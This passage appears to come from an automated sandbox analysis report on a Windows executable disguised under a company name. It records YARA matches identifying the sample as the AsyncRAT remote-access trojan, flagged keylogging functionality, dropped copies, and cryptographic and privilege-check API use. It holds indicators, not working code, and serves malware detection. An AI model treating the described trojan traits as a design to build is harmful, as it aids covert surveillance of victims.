              Source: powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_017C42040_2_017C4204
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_017CE1340_2_017CE134
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_017C70180_2_017C7018
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07860E280_2_07860E28
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786A7300_2_0786A730
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786C6480_2_0786C648
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_078630D00_2_078630D0
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07863F880_2_07863F88
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786AF930_2_0786AF93
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786AFA00_2_0786AFA0
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786CFF80_2_0786CFF8
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07863F770_2_07863F77
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07860E210_2_07860E21
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07863CEA0_2_07863CEA
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_07863CF00_2_07863CF0
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 0_2_0786AB680_2_0786AB68
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_031846D09_2_031846D0
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_03184CC89_2_03184CC8
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_031813E09_2_031813E0
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeCode function: 9_2_03181A499_2_03181A49
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0124420410_2_01244204
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0124E13410_2_0124E134
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0124701810_2_01247018
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777737110_2_07777371
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07770E2810_2_07770E28
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777A73010_2_0777A730
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777C64810_2_0777C648
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777C63710_2_0777C637
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777A6FF10_2_0777A6FF
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_077730D010_2_077730D0
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07773F7710_2_07773F77
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777CFF810_2_0777CFF8
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777CFE910_2_0777CFE9
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777AFA010_2_0777AFA0
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777AF9110_2_0777AF91
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07773F8810_2_07773F88
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07770E2710_2_07770E27
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07773CF010_2_07773CF0
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07773CEB10_2_07773CEB
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777AB6810_2_0777AB68
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0777AB5810_2_0777AB58
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_07777AB810_2_07777AB8
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0E96212810_2_0E962128
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 10_2_0E96367810_2_0E963678
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04E5B4A012_2_04E5B4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04E5B49012_2_04E5B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_08E33A9812_2_08E33A98
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 16_2_02AF13E016_2_02AF13E0
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exeCode function: 16_2_02AF1A4916_2_02AF1A49
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E7B49017_2_04E7B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04E7B47017_2_04E7B470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_08E63E9817_2_08E63E98
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_02B3B4A020_2_02B3B4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_02B3B49020_2_02B3B490
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0732440820_2_07324408
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_08493A9820_2_08493A98
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0164420422_2_01644204
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0164E13422_2_0164E134
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0164701822_2_01647018
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07960E2822_2_07960E28
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796A73022_2_0796A730
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796C64822_2_0796C648
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_079630D022_2_079630D0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796AF9122_2_0796AF91
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07963F8822_2_07963F88
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796AFA022_2_0796AFA0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796CFF822_2_0796CFF8
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07963F7722_2_07963F77
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07960E2122_2_07960E21
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07963CF022_2_07963CF0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_07963CEA22_2_07963CEA
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_0796AB6822_2_0796AB68
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_093E20F822_2_093E20F8
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 22_2_093E364822_2_093E3648
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 26_2_00C413E026_2_00C413E0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 26_2_00C41A4926_2_00C41A49
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0177420427_2_01774204
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0177E13427_2_0177E134
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0177701827_2_01777018
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA0E2827_2_07AA0E28
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAA73027_2_07AAA730
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAC64827_2_07AAC648
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA30D027_2_07AA30D0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAAFA027_2_07AAAFA0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA3F8827_2_07AA3F88
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAAF9127_2_07AAAF91
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AACFF827_2_07AACFF8
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA3F7727_2_07AA3F77
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA0E2127_2_07AA0E21
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA3CEA27_2_07AA3CEA
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AA3CF027_2_07AA3CF0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_07AAAB6827_2_07AAAB68
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0EC8222827_2_0EC82228
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 27_2_0EC8377827_2_0EC83778
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 31_2_00F513E031_2_00F513E0
              Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeCode function: 31_2_00F51A4931_2_00F51A49
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: invalid certificate
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2079413535.00000000059CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2071781432.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2092667055.000000000BA90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073615538.000000000498A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000000.2038933223.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4544624751.0000000006569000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4540909750.0000000004341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2383977857.000000000136E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2395996846.0000000005974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtasks.exej% vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2392500334.0000000004AEF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2475189992.0000000004EDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2477067466.0000000005A66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtasks.exe.m vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient222.exe4 vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exeBinary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exe.9.drBinary or memory string: OriginalFilenameOPHt.exeX vs SS Bottmac Engineers Pvt. Ltd..exe
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: SS Bottmac Engineers Pvt. Ltd..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: RTUZKYTc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: SS Bottmac Engineers Pvt. Ltd..exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
